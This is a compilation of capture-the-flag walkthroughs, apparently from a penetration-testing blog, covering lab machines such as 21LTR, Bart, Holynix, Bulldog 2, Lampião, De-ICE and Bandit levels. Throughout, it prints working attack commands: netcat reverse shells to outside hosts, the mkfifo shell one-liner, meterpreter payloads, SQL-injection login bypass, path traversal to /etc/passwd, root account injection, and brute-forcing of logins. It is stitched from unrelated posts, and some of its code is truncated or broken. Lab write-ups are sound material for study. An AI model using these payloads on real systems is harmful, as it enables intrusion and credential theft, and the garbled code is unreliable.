ftp 192.168.1.131

get lmao.zip

We found a zip file “lmao.zip” in FTP. But the zip had password protection.

Wait… what about the file we just decoded? Could it have password for the zip file?

fcrackzip –u –D –p decoded.txt lmao.zip

We found the password!

Let’s unzip the file now.

unzip lmao.zip

And enter the password: ItCantReallybeThisEasyRightLOL

We had high curiosity about the file “noob”.

cat noob

Turned out, it was an RSA key to SSH

Without any delay we tried to login to SSH using this RSA key but we got trolled, yet again!

chmod 600 noob

ssh –i noob noob@192.168.1.131

A complete arrow in the dark was to exploit shellshock vulnerability in SSH. So, we tried command:

ssh –i noob noob@192.168.1.131‘() ( : ;}; /bin/bash’

And we got logged in!

But it isn’t a proper teletype. We used web delivery in metasploit to create a python shell to get a proper meterpreter session.

msf > use multi/script/web_delivery

msf exploit(multi/script/web_delivery) > set payload python/meterpreter/reverse_tcp

msf exploit(multi/script/web_delivery) > set lhost 192.168.1.132

msf exploit(multi/script/web_delivery) > set lport 4444

msf exploit(multi/script/web_delivery) > run

We copied above generated python code to the improper bash we just created.

On the other hand, we had got a meterpreter session.

sysinfo

Let’s get into the shell and try to spawn a proper teletype.

shell

python –c “import pty;pty.spawn(‘/bin/bash’);”

find / -perm -4000 2>/dev/null

The r00t binary in these directory work differently, and change their behaviour with each other on every reboot. One of these binary (in our case it was in door2, it changes on reboot) accept a string as argument and print it.

We open the binary in gdb debugger to look at the assembly code for the binary. At main+71 we find a strcpy function, as strcpy function is vulnerable to buffer overflow we try to exploit it.

First we create a 500 bytes long string to find the EIP offset using patter_create script.

./pattern_create.rb -l 500

We run the file in gdb along with the 500-byte character as the argument and find that the EIP register was overwritten with 0x6a413969.

We pass that into /usr/share/metasploit-framework/tools/pattern_offset.rb, we get an offset of 268. So we need to write 268 characters and then write the address of the instructions we want to be executed.

./pattern_offset.rb -q 6a413969

After getting the offset we find the ESP and find it to be 0xbffffc70 but we create our exploit and execute it we get an error with illegal instruction that is because gdb has a different environment. Now we remove 1 byte and take the ESP to be 0xbffffc80. We run the binary by ignoring the environment along the exploit as the argument. As soon as we run the exploit we get a spawn a shell as root, we open the /root directory and find a file called Proof.txt. We take a look at the content of the files and find the final flag.

21LTR VM is a Boot to Root Challenge based on a scene that there is a penetration testing company and it has hired the players to perform the test on a client company’s internal network. We are given that the Target Machine has a static IP Address. You can download it from here:https://www.vulnhub.com/entry/21ltr-scene-1,3/

Penetrating Methodologies:

§ Network Scanning (Nmap,Netdiscover)

§ Examining HTTP web page

§ FTP Login for log.php file

§ Use php web shell one liner

§ Insert netcat reverse_shell payload

§ Spawn TTY shell

§ Editing passwd file for Privilege escalation

§ Get Root access

Let’s Begin

Target Machine’s IP Address: 192.168.2.120

Our first step towards penetration testing is scan our target with NMAP.

nmap 192.168.2.120

Result showed us that there are 4 ports opened: 21(ftp), 22(ssh), 80(http), 10001(scp-config).

To further explore and we browsed URL on port 80 and we greeted with a C Program featuring a loop as show in the given image.

http://192.168.2.120

After this we thought to check it’s the source code which lead us to some Logon Credentials.

Username: logs

Password: zg]E-b0]+8:(58G

So, we tried to connect with FTP through the logon credentials we found. After the successful login, we looked around to find a backup_log.phpfile which we downloaded to our local machine to have a closer look.

ftp 192.168.2.120

After Downloading the file to our local system, we used the cat command to open the file in our terminal as you can see that it contains a php program that is used to generate backup logs on the target system.

cat backup_log.php

Let’s see what we can find by directory brute forcing.

dirb http://192.168.2.120

It got us some directories but /logs looks more interesting so Let’s browse http://192.168.2.120/logs/

But as you can see in the image given below is that the logs directory is forbidden to access.

We tried to run some commands but didn’t get much success here.

This is where we got a bit stuck so after some internet searching hours we got in touch with the author of the lab and after his hint we got that we have to further twerk the 10001 port.

nc -nv 192.168.2.120 10001

We started a netcat session on the port 10001, we got a blank shell, which using a php one liner webshell

Now after using that php one liner, let’s see if we can run some commands. We tried to run whoami command. It replied with apache. This proves that we can run commands from here.

http://192.168.2.120/logs/backup_login.php?cmd=whoami

As we observed above that the commands run successfully, now we will try to get a reverse shell on our local machine using netcat. We will be doing this as shown in the image.

http://192.168.2.120/logs/backup_login.php?cmd=nc -e /bin/sh 192.168.2.12 443

Meanwhile we ran that command we also started a netcat listener on our local machine so as to get the shell which will be generated.

And as you can see that we got a basic bash shell on port 443 as shown in the image.

But this was an incomplete and improper shell so we invoked a proper shell using a python one liner

python -c'import pty; pty.spawn("/bin/sh")'

Now, we are in the target machine but still we have to escalate the privilege to become root. Here we started to enumerate the target machine for any possible way to get root.

After looking for a while we found a rsa private key in the media directory. We copied the key to our local machine.

cat id_rsa

Now we navigated to the user “passwd file” to get the info about the username that we can use for getting the ssh session. We found hbeale.

Now the RSA Private we copied, we saved it as id_rsa and change its permission using the chmod command so that it can act as a ssh private key.

chmod 600 id_rsa

After this we tried to connect to the target machine using ssh by user hbeale and the private key.

ssh -i id_rsa hbeale@192.168.2.120

And as you can see in the image given that we successfully got the shell of user hbeale. But as this is a boot to root challenge we have to escalated this shell into a root shell.

We used the sudo -l command to extract the information about the command that can be ran as root. We found out that we can run cat command.

Now back to our local machine, here we will use the openssl command to create a password salt for our new user that we will use to log into the target machine.

openssl passwd -1 -salt user3 pass123

On the Target machine we use the cat command to edit the /etc/passwdfile with the logon credentials of the user we meant to create (which is going to have the root privileges).

After successfully edit the /etc/passwd file, we will substitute the new user we created using the su command.

After entering the password which we created earlier, we logon to the root shell. This concludes this Boot to Root Challenge.

Hello friends!! Today we are going to solve another CTF challenge “Bart” which is available online for those who want to increase their skill in penetration testing and black box testing. Bart is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.81 so let’s begin with nmap port enumeration.

nmap -sV -p- 10.10.10.81

From given below image, you can observe we find only port 80 is open on target system.

As port 80 is running http, we open the IP address in our browser. As soon as we open the IP address we get redirected to “forum.bart.htb”.

Since htb doesn’t have global DNS, we aren’t going to be able to resolve the site. So we add a DNS entry in our /etc/hosts file to point 10.10.10.81 to both bart.htb and forum.bart.htb.

When we open forum.bart.htb, we find a website that has been built on wordpress.

When we open bart.htb it redirects us to forum.bart.htb. We enumerate directories for both domains and find a directory called “/monitor” for domain bart.htb.

dirb http://bart.htb/

When we open /monitor directory given by dirb scan and find a login page.

We use burpsuite to brute force the login page using /usr/share/wordlists/metasploit/common-root.txt dictionary and find the credentials to be harvery:potter.

We login using these credentials and get redirected to a different domain called monitor.bart.htb

We add the domain name monitor.bart.htb in /etc/hosts file.

Now when we refresh the page we get a page for server monitoring.

Going through the page we find a link to a site and a domain we need to add to /etc/hosts.

We add internal-01.bart.htbwe found earlier on the site to /etc/hosts.

We now open internal-01.bart.htb and find a login form.

We capture the login request using burpsuite and modify the request by changing login.php to register.php.

Then we login using the credentials we use to register and find a chat box.

We find a link to an open log, it looks like it may be vulnerable to LFI.

We were not able to access any system file but we were able to access log.php and find access logs.

Now we use log poisoning to get reverse shell. We change the user-agent to run whoami command, when we run the command we get the user name.

We were not able to run command injection, so we first create a reverse shell using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.6 lport=4444 -f exe > shell.exe

After creating our shell, we upload the payload to the target machine using powershell. First we setup our HTTP server using python.

python -m SimpleHTTPServer 80

We setup our listener using metasploit before executing the target machine.

msf > use exploit/multi/handler

msf > exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf > exploit(multi/handler) > set lhost 10.10.14.6

msf > exploit(multi/handler) > set lport 4444

msf > exploit(multi/handler) > run

We now execute the payload using log poisoning.

As soon as we execute the payload we get our reverse shell.

After we get the reverse shell we find that the system is 64-bit architecture so we change the payload type to 64-bit architecture.

msf > use windows/local/payload_inject

msf exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp

msf exploit(windows/local/payload_inject) > set lhost 10.10.14.6

msf exploit(windows/local/payload_inject) > set lport 1234

msf exploit(windows/local/payload_inject) > set session 1

msf exploit(windows/local/payload_inject) > run

After running the exploit, we get a 64-bit meterpreter shell. Now we can run post modules properly as 32-bit meterpreter was running into problems.

We use autologin post module to find the the password for Administrator user.

msf > use windows/gather/credentials/windows_autologin

msf post(windows/gather/credentials/windows_autologin) > set session 2

msf post(windows/gather/credentials/windows_autologin) > run

Now enumerating the target machine, we find that port 445 is running internally. So we use port forwarding so that we can use our machine to connect with it.

meterpreter > portfwd add -l 443 -p 445 -r 10.10.10.81

Now we use impacket-smbserver to create a smb server in our machine. So that we can share our payload with the target machine.

impacket-smbserver hack /root

Now the the session we had earlier died so port 4444 is free. So we are going to use that payload to get our reverse shell. First we run metasploit in a new tab and setup our listener.

msf > use multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 10.10.14.6

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > run

msf > use auxiliary/admin/smb/psexec_command

msf auxiliary(admin/smb/psexec_command) > set SMBUser Administrator

msf auxiliary(admin/smb/psexec_command) > set SMBPass 3130438f31186fbaf962f407711faddb

msf auxiliary(admin/smb/psexec_command) > set COMMAND \\\\10.10.14.6\\\hack\\\shell.exe

msf auxiliary(admin/smb/psexec_command) > set rhosts 127.0.0.1

msf auxiliary(admin/smb/psexec_command) > set rport 443

msf auxiliary(admin/smb/psexec_command) > run

As soon as we run psexec auxiliary we get reverse shell with as administrator.

In c:\Users\Administrator\Desktop we find a file called root.txt, when we open it and find our first flag.

Enumerating the system in c:\Users\h.potter we find a file called user.txt. When we take a look at the content of the file we get our second flag.

Hello friends! Today we are going to take another CTF challenge known as Holynix 1 and it is another boot2root challenge provided for practice and its security level is for the beginners. So let’s try to break through it. But before please note that you can download it from here https://www.vulnhub.com/entry/holynix-v1,20/

Penetrating Methodologies

Network Scanning (Nmap, netdiscover)
Surfing HTTP service port (80)
Exploit LFI/RFI Vulnerability
SQLMAP Scanning
Extract databases and user credentials
Login into the website with a specific user
Upload and execute a Reverse shell
Reverse connection (Netcat)
Exploiting target with SUDO binaries
Get the Root access

WalkThrough

Let’s start off with scanning the network to find our target.

We found our target –> 192.168.1.105

Our next step is to scan our target with NMAP.

nmap –p- -A 192.168.1.105

Result shows us that there is only port 80(http) opened

When we tried to login to the URL with some random username and password (Eg:admin/admin) it gave us an error . Upon further enumeration we found out that this is subjected to SQL injection error.

This appears to be a basic SQL query. We should now be able to execute the command to bypass the login using the or 1=1 technique

Username = ' or 1=1 #

Password = ' or 1=1 #

Once logged in, we noticed that actually we are inside the user Alamo’s login page. After having a look at different pages, we navigated to the Upload page and tried to upload the php-reverse-shell.phpfile

Upon trying to upload the file php-reverse-shell.php, we got the below notification .It seems the user Alamo, being a restricted user; doesn’t have permission to upload the file.

We ran nikto to find out more details of the URL and observed that there could be a LFI/RFI vulnerability associated with the same

nikto –h http://192.168.1.105

We need to see what information is being passed upon from the user to the web server .Let’s trigger the Burpsuite and try uploading a file again, and observe what is actually happening.

First open the URL, select the Email from the dropdown and click on the Display File page

The parameter being passed in the POST request is text_file_name=ssp%2Femail.txt&B=Display+Fileas seen from the Burpsuite screenshot below

As we are aware that there is a LFI/RFI vulnerability on this website .Therefore let’s try to modify the parameter being passed in the POST request of Burpsuite as follows text_file_name=ssp%2F../../../../../../../../../../etc/passwd&B=Display+File

Once we change the content of the file (as shown above) in Burpsuite , click on Forward tab and the website page will display all the contents of the /etc/passwd file

As we have got entire list of users, let’s choose any one random user first and run SQLMAP with following command, so as to find out other details

To begin with, we are taking the user etenenbaum as an example :

sqlmap -u http://192.168.1.105/index.php?page=login.php --forms --data="username=etenenbaum" --dbs --batch

We got the list of all databases!! Now we tried using creds database, with the following command to extract other users’ details

sqlmap -u http://192.168.1.105/index.php?page=login.php --forms --data="username=etenenbaum" -D creds --tables --dump --batch

We were able to login into the website with user etenenbaum and corresponding password (as displayed above) .The next step is to setup netcat listener on Kali machine. Upon uploading the shell script, the file got uploaded successfully; however when we executed the file there was no output on the Netcat listener reverse shell and the browser returned an error .

Here we got a clue from the website’s upload page that there is an option “Enable the automatic extraction of gzip archives”. This made us believe to try to upload the file this time , in the zip format

Below is the command to tar and zip the reverse shell file shell.php

tar -zcvf shell.tar.gz shell.php

Click on Browse and select the file shell.tar.gz from the Kali Desktop machine. Click on the option “Enable the automatic extraction of gzip archives” and then upload the file.

We now need to locate the path of the file we just uploaded, as the actual objective is to upload a PHP reverse shell script and then execute it. We navigated to many places however were not able to find our recently uploaded file . We also checked the ‘Upload’ directory (http://192.168.1.105/upload) however got no success.

It striked us suddenly about the statement displayed on the upload page which says “Home directory uploader” .Hence it may be possible that it could be uploading files to users’ home directory.

Appended the subdirectory /~etenenbaum/ and browsed URL http://192.168.1.105/~etenenbaum/and now we were able to see our uploaded file!!

We initiated the netcat listener on the Kali machine .Upon executing the file shell.php (as shown in the browser), we got the limited shell access

nc –lvp 1234

Now let’s perform further enumeration and try to escalate privileges.

Upon running the sudo command , we can see that there are multiple commands that will allow user www-data to sudo as root.

sudo –l

Navigate to the /tmp directory

cd /tmp/

Copy the /bin/bash file to the /tmp folder

cp /bin/bash .

Change the ownership of the file /tmp/bash , so that henceforth root is the owner

sudo chown root:root /tmp/bash

Backup the existing /bin/tar file to the bin/tar.bak

sudo mv /bin/tar /bin/tar.bak

Now move the /tmp/bash file to /bin/tar

sudo mv /tmp/bash /bin/tar

Execute the command /bin/tar (which is ideally running /bin/bash)

sudo /bin/tar

Finally run the id command to confirm the same

Hurray!! We got the root access

Hello friends! Today we are continuing to solve Bandit’s levels from Level 22. If you haven’t seen the previous part. It is strongly recommended to view the previous Part 1 and part 2.

Level 22-23

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

Again, we need to change our present directory with ‘/etc/cron.d’. Let’s list it out the files, here we can see that, there is a file ‘cronjob_bandit23’. Read this file and we got the path of the bash script.

cd /etc/cron.d

ls -la

cat cronjob_bandit23

cat /usr/bin/cronjob_bandit23.sh

echo I am user bandit23

echo I am user bandit23 | md5sum

echo I am user bandit23 | md5sum | cut -d '' -f 1

We’ll read this bash script and the code says that we need to input the username, here user is bandit23 because we need to find the password for bandit23. Just following the pattern of this script, we’ll be able to generate the path of password file.

cat /tmp/8ca419486bfbbc3663ea0fbe81326349

Now, we can read the password file using cat.

ssh bandit23@localhost

Level 23-24

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

Again, we’ll change our directory with ‘/etc/cron.d’. Let’s list out the files which are present in this directory. We found a file named ‘cronjob_bandit24’. Read this file and we found a bash script.

Let’s see what does it work?

cd /etc/cron.d

ls -la

cat cronjob_bandit24

cat /usr/bin/cronjob_bandit24.sh

We can say that, this file is executing and deleting all scripts which are present in ‘/var/spool/$myname’.

So, first make a directory in ‘/tmp’ and write a bash script using nano.

mkdir /tmp/Ignite123

cd /tmp/Ignite123

nano bandit24.sh

Here, I’m instructing that just read the file bandit24 which is present in the ‘/etc/bandit24’ directory and transfer it into ‘/tmp/Ignite123/level24’.

//CODE

#!/bin/sh

cat /etc/bandit_pass/bandit24 >> /tmp/Ignite123/level24

‘>>’ redirects output to a file appending the redirected output at the end.

Now, change the permission then copy and paste this file to ‘/var/spool/bandit24’.

chmod 777 bandit24.sh

cp bandit24.sh /var/spool/bandit24/

chmod 777 /tmp/Ignite123

Wait for a minute so that our script get execute and gives us a result. List the files and we will see the file name ‘level24’. Read the file using cat.

cat level24

The above password can be used to connect bandit24.

ssh bandit24@localhost

Level 24-25

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

Here, I tried to see that how the things are working?

nc localhost 30002

cd /tmp/Ignite123

nano brute.sh

We can see that after single space we need to give the 4-digit pincode.

So, We need to write a bash script that brute force the pincode.

Same as previous way, create a new directory and write a bash script using nano.

//Code

#!/bin/bash

passwd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"

for i in {0..9}{0..9}{0..9}{0..9}

echo $passwd''$i >> output.txt

done

In script, we need to use for loop so that all the 4 places and all the possible combinations can be create on each place.

Change the permission and execute it.

chmod brute.sh

As we can see that that output.txt named file and it contains all the possible 4-digit combinations.

./brute.sh

ls -la

Now, we just use the output file with netcat and produce the ouput in result.txtfile.

Sort the content of result file and find the uniq text.

Hurray, we got the password for bandit25.

cat output.txt | nc localhost 30002 >> result.txt

sort result.txt | uniq -u

The above password can be used to connect bandit25.

ssh bandit25@localhost

Level 25-26

Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

First list out the file, it’s our first step when we don’t know how to proceed ;) .

Try to connect connect bandit26 using private key file.

ls –la

ssh -i bandit26.sshkey bandit26@localhost

Alas!!! The connection get terminated.

According to my experience, I go into ‘/etc/passwd’ file.

cat /etc/passwd

/etc/passwd file is used to keep track of every registered user that has access to a system.

Here, we can see that there is a file in the /use/bin.

Just read this file and we can see that there is a script which is talking about more.

cat /usr/bin/showtext

Let’s know about more.

man more

To activate ‘more’, we just need to reduce the size of terminal.

Let’s try to connect again and make sure you have reduced the size of the terminal.

ssh -i bandit26.sshkey bandit26@localhost

Press v

Here, we can see that ‘More’ is activated. Just press ‘v’ to enter in the vim mode.

Type these commands to gain shell.

:set shell=/bin/bash

:shell

ls –la

cat README.txt

Hello friends!! Today we are going to solve another CTF challenge “Bulldog 2”. This VM is developed by Nick Frichette, which is a standard Boot-to-Root challenge. Our goal is to get into the root directory and see the congratulatory message.

Level: Intermediate

Task: To Find The Final Flag.

Steps involved:

1. Post scanning to discover open ports

2. Discovery of top monthly users

3. Discovery of authorization of admin in a Javascript file

4. Bruteforcing each user with fasttrack.txt

5. Modification of response code of correct credential to make it master_admin_user

6. Discovery of new admin dashboard

7. Exlpoiting RCE in password tab in Login page

8. Getting netcat shell

9. Spawning a teletype

10. Escalating privileges using writable /etc/passwd file

Let’s Breach!!

The target holds 192.168.1.120 as network IP; now using nmap lets find out open ports.

nmap –A 192.168.1.120

Nmap scan shows us port 80 is open, so we open the ip address in our browser.

We saw a Registertab on the Homepage. After Clicking on it, a notice was given on that page stating that they are not accepting registration at this time due to security concerns. This means we can’t register as a new user.

There was a Login tab as well on the Homepage, which led us to think if we can’t register as a new user then let’s login as an existing user. It came into our notice that there was a User’s Tab given on the Homepage.

After exploring the details inside the Users Tab, we came to know about all the usernames of the Top Monthly Users. This can be used as a clue later on.

Next we thought of Viewing the Page Source of the Webpage, where we found a file main.8b490782e52b9899e2a7.bundle.js .

After viewing the contents of this file, we found out that master_admin_userhas the highest auth_level.

We thought of capturing the request of the LoginPage in BurpSuite. Send the captured request to the intruder. Select attack type as Cluster Bomb to perform brute forcing over Username and Password.

Now we have selected the Payloadtype as Simplelist for Payloadset1 where we have given the list all the usernames of the TopMonthlyUsers found earlier.

Similarly for Payloadset2 we have given Payloadtype as Simplelist, here we have loaded the dictionary file of fasttrack.txt.

Once Brute Forcing is completed, we have got the passwordqwerty for the usernamemdrudie.

Now logging in with username mdrudie and password qwerty. As you can see these details have successfully logged us in.

Now capturing the request of the Login page, we will also intercept the response of the captured request.

We have copied this response and decoded it using an online JSON Token converter. Here we see the auth_level is at standard_user.

Changing the auth_level to master_admin_user. This will give us the admin privileges.

Now copy the editedencodedresponse and Replace it with the oldencodedresponse in the BurpSuite. Also change the auth_levelto master_admin_level as shown in the image.

On forwarding the request, we have successfully logged in the user with admin privileges.

Now clicking on the Admin tab, an Admin Dashboard login form opens up which asks for a username and password.The line about using a CLI tool to log in gave us a hint about command injection. Unfortunately, it's a blind command injection.

Now we will dump the icmp packets that are destined towards eth0 interface. By using command:

tcpdump -i eth0 icmp

Now by capturing the request of the LoginForm of the Admin Dashboard using usernamemdrudie and passwordqwerty through burp suite. Now we will check if the command injection is working in the password input area by using command:

; ping 192.168.1.104 –c 4

Since we are able to capture the icmppackets at eth0 interface, this means command injection is working in the password input area.

Now using the reverse shell one liner in the password input area which is given below:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Side by Side we have activated a netcat listener and obtained a shell.

We will be checking permissions for /etc/passwd directory using command:

ls -al /etc/passwd

As you can see this directory is having permission to read, write and execute.

We read the /etc/passwd file using cat utility after that.

Our aim was to add a user in /etc/passwd file as root. So, we use openssl utility to create a password hash with the command:

openssl passwd –l –salt user3 pass123

Copy the password hash in someplace safe now.

Copy the /etc/passwd file in a leafpad file and let’s add our custom user in there.

hack:$1$user3$/:0:0:/hack:/bin/bash

Save this file somewhere on desktop and download this file on server’s /tmp (universal writeable) directory.
Then use cp to copy and replace this file with the original file with the command:
cp passwd /etc/passwd

Let’s try and login using su binary:
Su hack
[password]: pass123
Oh yeah, we got the root shell! Let’s read the flag now.

cd /root

cat flag.txt

Hello friends!! Today we are going to solve another CTF challenge “Lampião: 1”. This VM is developed by Tiago Tavares, which is a standard Boot-to-Root challenge. Our goal is to get into the root directory and see the congratulatory message.
Level: Easy
Task: To Find The Final Flag.
Let’s Breach!!
The target holds 192.168.1.105 as network IP; now using nmap lets find out open ports.
nmap –p- -A 192.168.1.105

Nmap scan shows us port 22, 80, 1898 are open, so we thought of opening the IP address along with the port 1898 in our browser. It also gave us a clue about the webpage that it has drupal running on it.

From the previous clue we thought of exploiting it by using exploit drupal_drupalgeddon2.
msf > user explot/unix/webapp/drupal_drupalgeddon2
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.105
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
msf exploit(unix/webapp/drupal_drupalgeddon2) > exploit
Booyeah!! We have got the meterpreter, therefore we thought of checking the some description about Victim’s Machine by using command:
Lsb_release -a
The description gave us a very strong hint from the VersionNumber of the Victim’sMachine for our Next Step.

After a long search using the earlier clue about the Version Number, We have finally found the exploit that we were looking for and we have downloaded it on our machine.

Side by Side we have executed a python server which will help us to download the exploit over Victim’s Machine.

We have download this file on server’s /tmp (universal writeable) directory. Since the exploit is in .cpp format therefore to compile and execute it, there were specific commands given in the code of the exploit. This gave us a hint on how to compile and execute the exploit 40847.ccp.
Boom, we got the root shell! Let’s read the flag now.
cd /root
ls
cat flag.txt

Hello and welcome readers to another CTF challenge De-ice s1.130. This is the third installment in the series of vulnerable machines in de-ice series. You can download de-ice from the official vulnhub repository here.

The aim of this challenge is to get root and read the congratulatory flag.

Difficulty Level: Intermediate

A new penetration tester with raw skills might not be able to solve this lab since it also has some debugging of algorithm, I would rate the level of this lab as intermediate.

Steps involved:

1. IP grabbing

2. Port scanning

3. Setting up an SMTP listener to validate users

4. Python scripting to enumerate the SMTP users

5. Bruteforcing ssh using the username we grabbed

6. Creating a custom wordlist using mail we read in csadmin to bruteforce sdadmin

7. Creating a custom wordlist using mail we read in sdadmin to bruteforce dbadmin

8. Adjoining part files in all 3 accounts

9. Cleaning and debugging the algorithm using Java language

10. Running the program to create a password for sysadmin

11. Logging into root using su binary and nabbing the flag

Let’s get started then!

I found that the IP address of the lab was 192.168.1.20 and my Kali had an IP 192.168.1.108

netdiscover

As usual, the first step was to scan the open ports using nmap. Nmap is the most popular tool used to scan for open ports. However, you can use other tool as well and it would work just as fine.

nmap –A 192.168.1.20

Without any delay, I moved on to the website since port 80 was open.

I didn’t find anything good here and neither did nikto tell me anything important.

So, I clicked the link below and it opened another web page.

There was nothing useful here as well. But wait, we did find an email ID that could be related to the server user. So, I tried activating a netcat listener on SMTP.

nc –v 192.168.1.20 25

Rcpt to: kali

I tried a custom domain here as it required a mail from tag.

Mail from: kali@slax.example.net

But it did not work and neither did some other combination. But still, connection wasn’t getting reset and it let me check the users, so I could generate permutations of users and hit them and see which one is a legal user!

I made a python script that would enumerate the users easily. Save this as smtp_enum.py

Code:

import sys

filename = sys.argv[2]

with open(filename) as f:

users = [line.strip() for line in f.readlines() if line]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((sys.argv[1], 25))

fn = s.makefile('rwb')

fn.readline()

fn.write('mail from: kali@slax.example.net \r\n')

fn.flush()

fn.readline()

for user in users:

fn.write('rcpt to: %s\r\n' % user)

fn.flush()

print '%s: %s' % (user, fn.readline().strip())

fn.write('QUIT\r\n')

fn.flush()

s.close()

(A huge shoutout to cyberry for this script. You can visit this website here)

Inputs in the script: IP address of victim

We generated a list of usernames based on the permutations of the mail found: customerserviceadmin@nosecbank.com

I created another script user-mutator.py that mutates the users but only using upto at max 3 options provided.

For example if the username is cservicea, follow that c-service-a are 3 different options.

It will not generate a username, let’s say, csservicea (c-s-service-a)

Now, I ran this script and saved the results or output in a text file called userlist.txt

cd Desktop

python user-mutator.py >> userlist.py

Now, I’ll run the script and append the output in a text file called matches.txt

Mind you, this will append all the outputs regardless the user is right or not. Hence, I’ll use a grep filter to check the correct user.

python smtp_enum.py 192.168.1.20 userlist.txt >> matches.txt

cat matches.txt | grep “ok”

It did the work! We found a user called csadmin. Now it’s time to bruteforce this using the password list rockyou.txt

hydra –l csadmin –P /usr/share/wordlists/rockyou.txt 192.168.1.20 ssh

A password was found!

Let’s log into ssh using this username and password.

ssh csadmin@192.168.1.20

Password: rocker

cd /home

When I read the /etc/passwd file, I found a sysadmin user with escalated privileges. This could do the trick but right now we need to focus on the shell we just got.

I went back to home directory and found a folder called mailserv_downloads

This had 2 messages or emails.

I read the first one first.

cd mailserv_download/

I read the mail using cat command

cat 2010122014234.j12Gqo4H049241

It looked like an important mail since it mentioned a sender sdadmin. It also has details about sdadmin’s son’s birthday. If he kept his password simple, we could crack it using cup and that’s what we did. But before that I also examined the part file but as expected, it had nothing.

Let’s make a custom dictionary using cup now.

cupp –i

And fill the details as deemed in the mail.

The dictionary was saved in /home under the name of paul.txt

We copied it on desktop and bruteforced ssh using hydra.

hydra –l sdadmin –P /root/Desktop/paul.txt 192.168.1.20 22

Voila! A password was found for sdadmin using the custom dictionary.

Lets login to ssh using these credentials.

ssh sdadmin@192.168.1.20

Password: donovin1998

It works! Let’s navigate for another piece of information in home directory now.

cd mailserv_download

cat 2010122015043.j15Htu1H341102

Of course there is another part file, part 3. This gives an idea that dbadmin might have the last missing piece. But before that we need to steal dbadmin’s credentials.

Can this mail help?

This looked like a reply to a mail we read earlier. This mail also talked about a “databaser.” Right hand to god, this could be dbadmin. Hence, we created another custom dictionary using cupp to bruteforce dbadmin.

cupp -i

The name was fred.txt this time. We again bruteforced ssh using hydra.

hydra –l dbadmin –P /root/Desktop/fred.txt 192.168.1.20 ssh

A password was found!

dbadmin: databaser60

Lets login ssh using this credential.

cd mailserv_download/

We finally found the last missing piece of the 3 part mail.

I copied all these 3 mails into 3 separate text files on my local machine with names part1, part2, and part3.

I concatenated all these 3 files into a single file complete.txt

cat part1.txt part2.txt part3.txt >> complete.txt

But there were too many useless characters and lines.

This step took way too much time than we can describe in the scope of this article since I cleaned extra spaces, tabs, characters, lines and made it readable but first of the many steps can be described as:

strings complete.txt | grep –v “ERROR:MESSAGE CORRUPTED” >> full

So on and so forth went the editing until the text file was readable:

cat full | sed “s/^[\t]*//” | grep –P ‘\t’ | sed “s/^[^0-9]*//”

Hmm… This looked like an algorithm. Comments also cleared some of the info to complete all the dots together.

Here is what we established:

1. This is an algorithm which takes input the username and creates a password (1^st comment says so)

2. We could generate password for sysadmin

Hence, there was a need to create a program using the algorithm. I tried C, it was giving an error due to an unresolved issue, therefore I went back to cyberry’s blog (A huge shoutout to him again) and found his Java code.

Quite a genius he is!

Code:

import java.io.*;

//import java.util.Arrays;

public class s130fixed

{

public static void main(String[] args)

{

try

{

System.out.println("Password Generator");

BufferedReader in=new BufferedReader(new InputStreamReader(System.in));

System.out.print("[?] Username: ");

String input=in.readLine();

int[] output=processLoop(input);

//System.out.println("[+] Output: "+Arrays.toString(output));

String outputASCII="";

for(int i=0;i

System.out.println("[>] Password: "+outputASCII);

}

catch(IOException e)

{

System.out.println("[-] IO Error!");

}

/*input is username of account*/

public static int[] processLoop(String input){

int strL=input.length();

int lChar=(int)input.charAt(strL-1);

int fChar=(int)input.charAt(0);

int[] encArr=new int[strL+2];

encArr[0]=(int)lChar;

for(int i=1;i

encArr[encArr.length-1]=(int)fChar;

encArr=backLoop(encArr);

encArr=loopBack(encArr);

encArr=loopProcess(encArr);

int j=encArr.length-1;

for(int i=0;i

if(i==j) break;

int t=encArr[i];

encArr[i]=encArr[j];

encArr[j]=t;

j--;

}

return encArr;

}

/*Note the pseudocode will be implemented with the

root account and my account, we still need to implement it with the csadmin, sdadmin,

and dbadmin accounts though*/

public static int[] backLoop(int[] input){

int ref=input.length;

int a=input[1];

int b=input[ref-1];

int ch=(a+b)/2;

for(int i=0;i

if(i%2==0) input[i]=(input[i]%ch)+(ref+i);

else input[i]=(input[i]+ref+i);

}

return input;

}

public static int[] loopBack(int[] input){

int ref=input.length/2;

int[] encNew=new int[input.length+ref];

int ch=0;

for(int i=(ref/2);i

encNew[i]=input[ch];

ch++;

}

for(int i=0;i

if(encNew[i]<=33) encNew[i]=33+(++ref*2);

else if(encNew[i]>=126) encNew[i]=126-(--ref*2);

else{

if(i%2==0) encNew[i]-=(i%3);

else encNew[i]+=(i%2);

}

return encNew;

}

public static int[] loopProcess(int[] input){

for(int i=0;i

if(input[i]==40||input[i]==41) input[i]+=input.length;

else if(input[i]==45) input[i]+=20+i;

}

return input;

}

